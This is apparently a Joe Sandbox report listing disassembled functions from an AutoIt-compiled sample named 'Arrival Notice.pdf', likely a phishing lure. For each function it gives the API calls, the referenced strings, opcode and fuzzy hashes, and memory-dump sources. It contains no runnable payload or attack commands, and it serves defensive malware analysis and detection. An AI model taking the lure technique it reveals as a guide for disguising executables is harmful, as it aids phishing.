Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 095fb49ff3591ca7d9f51a7c5b3f9674e02ffb5f619bd0623b51b9869b3326bd
Instruction ID: bc90eaf66c8af43a02bc7d488e455edee78294eeb15f9c9a53c246cf5c8067e8
Opcode Fuzzy Hash: 095fb49ff3591ca7d9f51a7c5b3f9674e02ffb5f619bd0623b51b9869b3326bd
Instruction Fuzzy Hash: 0C3113B0D1831AAADF109FB68C8995FBFE8FF04750F50452AA50DE7280DA78A5008FA5

Function 0024C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0025E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0024C8B7,?,00002000,?,?,00000000,?,0024419E,?,?,?,002DDC00), ref: 0025E984

Part of subcall function 0024660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002453B1,?,?,002461FF,?,00000000,00000001,00000000), ref: 0024662F

__wsplitpath.LIBCMT ref: 0024C93E

Part of subcall function 00261DFC: __wsplitpath_helper.LIBCMT ref: 00261E3C

_wcscpy.LIBCMT ref: 0024C953
_wcscat.LIBCMT ref: 0024C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0024C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0024CABE

Part of subcall function 0024B337: _wcscpy.LIBCMT ref: 0024B36F

Strings

Error opening the file, xrefs: 002B30B4, 002B313D
>>>AUTOIT SCRIPT<<<, xrefs: 002B311B
Unterminated string, xrefs: 002B3470
EA06, xrefs: 002B30C9
#include depth exceeded. Make sure there are no recursive includes, xrefs: 002B3098
AU3!, xrefs: 0024C90C
Bad directive syntax error, xrefs: 002B3429

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: a2afc57bcf1c7854535457b26ed4fa3c43c9b24d053026e050ec9c6dde8a1154
Instruction ID: eaeb5db871f1c4044663194a82f5597b59b352682ea9b6d3f7a73c75a270343b
Opcode Fuzzy Hash: a2afc57bcf1c7854535457b26ed4fa3c43c9b24d053026e050ec9c6dde8a1154
Instruction Fuzzy Hash: 0312B1715283419FC728EF28C881AAFBBE4BF89344F54491EF58993251DB30DA69CF52

Function 002ACE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002ACEFB
DestroyWindow.USER32(?,?), ref: 002ACF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002ACFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002AD016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002AD025
DestroyWindow.USER32(?), ref: 002AD042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00240000,00000000), ref: 002AD075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002AD094
GetDesktopWindow.USER32 ref: 002AD0A9
GetWindowRect.USER32(00000000), ref: 002AD0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002AD0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002AD0DA

Part of subcall function 0025B526: GetWindowLongW.USER32(?,000000EB), ref: 0025B537

Strings

tooltips_class32, xrefs: 002ACFED, 002AD06E
0, xrefs: 002ACF1B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 68e59f0173739e2ba598b6a113f6abaf7c2efc0005616c7954e6300fbac7cacb
Instruction ID: ba12d698cf7dbdfbf13458bfed4e654810e89bdcf26a1c8a478288ab09563038
Opcode Fuzzy Hash: 68e59f0173739e2ba598b6a113f6abaf7c2efc0005616c7954e6300fbac7cacb
Instruction Fuzzy Hash: FA71FEB0160306AFD725CF28DC84F6677E9EB8A704F14451EF986872A1DB75E852CF22

Function 002AF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

DragQueryPoint.SHELL32(?,?), ref: 002AF37A

Part of subcall function 002AD7DE: ClientToScreen.USER32(?,?), ref: 002AD807
Part of subcall function 002AD7DE: GetWindowRect.USER32(?,?), ref: 002AD87D
Part of subcall function 002AD7DE: PtInRect.USER32(?,?,002AED5A), ref: 002AD88D

SendMessageW.USER32(?,000000B0,?,?), ref: 002AF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002AF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002AF411
_wcscat.LIBCMT ref: 002AF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 002AF458
SendMessageW.USER32(?,000000B0,?,?), ref: 002AF471
SendMessageW.USER32(?,000000B1,?,?), ref: 002AF488
SendMessageW.USER32(?,000000B1,?,?), ref: 002AF4AA
DragFinish.SHELL32(?), ref: 002AF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002AF59C

Strings

@GUI_DROPID, xrefs: 002AF4D1
@GUI_DRAGFILE, xrefs: 002AF54B
@GUI_DRAGID, xrefs: 002AF510

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 0ea4fa992019aa82f076bd9d78e86c70b2690d1ac0a976de5aff86cbb00a3218
Instruction ID: 7c40eaf0348c26395cff9825e0e3454f274e2835873e6e800213d492e3126087
Opcode Fuzzy Hash: 0ea4fa992019aa82f076bd9d78e86c70b2690d1ac0a976de5aff86cbb00a3218
Instruction Fuzzy Hash: 07615A71118304AFC315EF64DC89DABBBF8EF89750F100A2EF695921A1DB709A19CB52

Function 0028AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0028AB3D
VariantCopy.OLEAUT32(?,?), ref: 0028AB46
VariantClear.OLEAUT32(?), ref: 0028AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0028AC40
__swprintf.LIBCMT ref: 0028AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0028AC9C
VariantInit.OLEAUT32(?), ref: 0028AD4D
SysFreeString.OLEAUT32(00000016), ref: 0028ADDF
VariantClear.OLEAUT32(?), ref: 0028AE35
VariantClear.OLEAUT32(?), ref: 0028AE44
VariantInit.OLEAUT32(00000000), ref: 0028AE80

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0028AC6A
Default, xrefs: 0028ACFD

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 45ff3d6d3a3179a755140419b7ec671f00a3632d86c465c39e437064746b86cf
Instruction ID: 9090985b17ae3f678fe5ac8a8f383f7de48a20033c76e83be83c2c9419f652bb
Opcode Fuzzy Hash: 45ff3d6d3a3179a755140419b7ec671f00a3632d86c465c39e437064746b86cf
Instruction Fuzzy Hash: 48D1F139622106DBEB24AF69D885B6AB7B5FF04700F248467E5059B1C1DFB0EC70DB92

Function 002A716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002A71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002A7247

Strings

GETTOTALCOUNT, xrefs: 002A722A
EXPAND, xrefs: 002A72E1
UNCHECK, xrefs: 002A740B
SELECT, xrefs: 002A73E0
GETITEMCOUNT, xrefs: 002A7311
COLLAPSE, xrefs: 002A728D
EXISTS, xrefs: 002A72B0
GETTEXT, xrefs: 002A7382
CHECK, xrefs: 002A7267
ISCHECKED, xrefs: 002A73B2
GETSELECTED, xrefs: 002A733F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 5d6c6bc9f98c2bea749f9c014062d57ae040c6ec8905cf58f5ba22492ff340ed
Instruction ID: 18fada511c5f22cf267b27274d31fde6ff7c2cecb8e00d856d61762b25a26400
Opcode Fuzzy Hash: 5d6c6bc9f98c2bea749f9c014062d57ae040c6ec8905cf58f5ba22492ff340ed
Instruction Fuzzy Hash: B29173302246018BCB08EF20C851A6EB7A5AF55750F1148ADFD96573A3DF70ED6ACF85

Function 0027CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0027CF50), ref: 0027CE90

Strings

CLASS, xrefs: 0027CC10
TEXT, xrefs: 0027CDC7
L+/, xrefs: 0027CD14
4+/, xrefs: 0027CC96
P+/, xrefs: 0027CD43
NAME, xrefs: 0027CCC2
T+/, xrefs: 0027CD72
H+/, xrefs: 0027CCE8
REGEXPCLASS, xrefs: 0027CC56
INSTANCE, xrefs: 0027CD9E
CLASSNN, xrefs: 0027CC33

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+/$CLASS$CLASSNN$H+/$INSTANCE$L+/$NAME$P+/$REGEXPCLASS$T+/$TEXT
API String ID: 3555792229-2774345106
Opcode ID: 3ace006af95289972b335e7b50be4b2da43d6eda8240318634e9b8cb138dce19
Instruction ID: 53bef8b56cb280993687072e2cabd04adf064dc8830d7da1cd71143df742059e
Opcode Fuzzy Hash: 3ace006af95289972b335e7b50be4b2da43d6eda8240318634e9b8cb138dce19
Instruction Fuzzy Hash: 92915D30620506ABCB18DF70C481BEAFB75BF05344F64852AE95DA7151DF70A9B9CB90

Function 002AE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002AE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,002A9808,?), ref: 002AE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002AE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002AE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002AE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,002A9808,?), ref: 002AE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002AE6DF
DestroyIcon.USER32(?), ref: 002AE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002AE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002AE717

Part of subcall function 00260FA7: __wcsicmp_l.LIBCMT ref: 00261030

Strings

.exe, xrefs: 002AE541
.icl, xrefs: 002AE521
.dll, xrefs: 002AE564

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 6c0d627abf475d7abc84304aa7a11bef4731793e3f82668765e29f9479d97433
Instruction ID: 55be4748ae80d813e110bb40f3f7d53b6f64d6395bb836623e6e3cd2cbb23408
Opcode Fuzzy Hash: 6c0d627abf475d7abc84304aa7a11bef4731793e3f82668765e29f9479d97433
Instruction Fuzzy Hash: 7C61FE71920219BBEF24DF24DC86FBE7BACAB19B14F104515F911D60D1EBB099A1CBA0

Function 0028D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

CharLowerBuffW.USER32(?,?), ref: 0028D292
GetDriveTypeW.KERNEL32 ref: 0028D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0028D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0028D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0028D38C

Strings

set cd door , xrefs: 0028D32D
closed, xrefs: 0028D2A6, 0028D2AF
close cd wait, xrefs: 0028D377
type cdaudio alias cd wait, xrefs: 0028D30A
open , xrefs: 0028D2EE
close, xrefs: 0028D298
open, xrefs: 0028D2B9
wait, xrefs: 0028D349

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 5f53a954b27e839caba4f28fcc113be41150fcd51315f162f34766a701ab86be
Instruction ID: b5466e1ad4086b84b7c794a4391f7a87574885cc47177448f4303f570c963c5a
Opcode Fuzzy Hash: 5f53a954b27e839caba4f28fcc113be41150fcd51315f162f34766a701ab86be
Instruction Fuzzy Hash: 40513B751246059FC704EF10C88196EB7E4EF99758F10486DF88A672A2DB31EE2ACF42

Function 002826BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,002B3973,00000016,0000138C,00000016,?,00000016,002DDDB4,00000000,?), ref: 002826F1
LoadStringW.USER32(00000000,?,002B3973,00000016), ref: 002826FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,002B3973,00000016,0000138C,00000016,?,00000016,002DDDB4,00000000,?,00000016), ref: 0028271C
LoadStringW.USER32(00000000,?,002B3973,00000016), ref: 0028271F
__swprintf.LIBCMT ref: 0028276F
__swprintf.LIBCMT ref: 00282780
_wprintf.LIBCMT ref: 00282829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00282840

Strings

^ ERROR, xrefs: 002827D5
Line %d:, xrefs: 0028277A
Error: , xrefs: 002827F7
%s (%d) : ==> %s: %s %s, xrefs: 00282824
Line %d (File "%s"):, xrefs: 00282769

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: d9ced7e59c92056d19be0e9ab788160d20135aa287744718acea1e0c86bad363
Instruction ID: c2ff03c0a140e0bf6a5fa9f3e33734675e64e939cad8608736492f071a34548b
Opcode Fuzzy Hash: d9ced7e59c92056d19be0e9ab788160d20135aa287744718acea1e0c86bad363
Instruction Fuzzy Hash: 0D412C72811219BACF19FBE4DD86EEEB778AF15344F100065B60572092EA746F69CF60

Function 0028D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0028D0D8
__swprintf.LIBCMT ref: 0028D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0028D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0028D15C
_memset.LIBCMT ref: 0028D17B
_wcsncpy.LIBCMT ref: 0028D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0028D1EC
CloseHandle.KERNEL32(00000000), ref: 0028D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0028D200
CloseHandle.KERNEL32(00000000), ref: 0028D20A

Strings

\??\%s, xrefs: 0028D0F4
\, xrefs: 0028D110
:, xrefs: 0028D11B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 75191a778eada0618e7678d12913f24796fb40824f28668b35fcf4dc2f64a9f0
Instruction ID: 5f4bf76065d94cf5c6e85ac5c5250e5c95636014a454a3f98fb58fd8196b49fa
Opcode Fuzzy Hash: 75191a778eada0618e7678d12913f24796fb40824f28668b35fcf4dc2f64a9f0
Instruction Fuzzy Hash: 7E31C37651010AABDB21EFA0DC48FEB77BCEF88740F1040B6F909D21A5E770A6548B24

Function 002787CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 0027882D
___wtomb_environ.LIBCMT ref: 0027884F

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

__malloc_crt.LIBCMT ref: 00278875
__malloc_crt.LIBCMT ref: 00278892
_free.LIBCMT ref: 002788C9
__recalloc_crt.LIBCMT ref: 00278902
__recalloc_crt.LIBCMT ref: 00278947
_strlen.LIBCMT ref: 00278973
__calloc_crt.LIBCMT ref: 0027897D
_strlen.LIBCMT ref: 0027898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 002789BA
_free.LIBCMT ref: 002789D4
_free.LIBCMT ref: 002789E1
_free.LIBCMT ref: 002789F3
__invoke_watson.LIBCMT ref: 00278A0D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 484112be97296d7f6545fc7659a5117406f8384608359d1f7bd000dff05b7a42
Instruction ID: dd5cbe002e982d493870050dd338252a24d028cc91371026f3b8e2730b6ff2bb
Opcode Fuzzy Hash: 484112be97296d7f6545fc7659a5117406f8384608359d1f7bd000dff05b7a42
Instruction Fuzzy Hash: DE6107329A1216EFDB255F64DC49B7977A8EF00720F248126E809EB2C1DF74D970CB96

Function 002AE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 002AE754
GetFileSize.KERNEL32(00000000,00000000), ref: 002AE76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 002AE776
CloseHandle.KERNEL32(00000000), ref: 002AE783
GlobalLock.KERNEL32(00000000), ref: 002AE78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002AE79B
GlobalUnlock.KERNEL32(00000000), ref: 002AE7A4
CloseHandle.KERNEL32(00000000), ref: 002AE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 002AE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,002CD9BC,?), ref: 002AE7D5
GlobalFree.KERNEL32(00000000), ref: 002AE7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 002AE809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 002AE834
DeleteObject.GDI32(00000000), ref: 002AE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002AE872

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 81aaa8f26ff4723d82231feb36dbb6c3e1aeed77849d808ce140dfac5691efe5
Instruction ID: d139fb53de729c67546d7eb56d8edcd5a77898760480aeda373c20803075f421
Opcode Fuzzy Hash: 81aaa8f26ff4723d82231feb36dbb6c3e1aeed77849d808ce140dfac5691efe5
Instruction Fuzzy Hash: 8D414A75600205FFDB119F65EC4CEAABBB8EF8A711F104068F909D7260CB70AD41DB60

Function 002905F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0029076F
_wcscat.LIBCMT ref: 00290787
_wcscat.LIBCMT ref: 00290799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002907AE
SetCurrentDirectoryW.KERNEL32(?), ref: 002907C2
GetFileAttributesW.KERNEL32(?), ref: 002907DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 002907F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00290806

Strings

*.*, xrefs: 00290845

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
